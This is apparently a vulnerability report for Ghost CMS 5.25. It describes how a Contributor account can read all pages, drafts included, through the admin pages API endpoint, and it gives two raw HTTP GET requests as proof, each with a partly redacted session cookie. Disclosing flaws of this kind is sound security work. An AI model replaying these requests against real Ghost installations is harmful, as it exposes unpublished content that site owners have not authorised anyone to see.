Vulnerable API endpoint: /ghost/api/admin/pages/
A user with Contributor privileges is able to view all created pages, including draft or hidden ones, through the Admin API.
HTTP Request to get all pages
GET /ghost/api/admin/pages/ HTTP/1.1
Host: [GHOST_HOST]
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-Ghost-Version: 5.25
App-Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json; charset=UTF-8
Referer: http://gege:2368/ghost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ghost-admin-api-session=s%3AMBZT[SNIPPED_COOKIE]oN%2BzIU
Connection: close
HTTP Request to get a specific page
GET /ghost/api/admin/pages/[:pageId] HTTP/1.1
Host: [GHOST_HOST]
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-Ghost-Version: 5.25
App-Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json; charset=UTF-8
Referer: http://gege:2368/ghost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ghost-admin-api-session=s%3AMBZT[SNIPPED_COOKIE]oN%2BzIU
Connection: close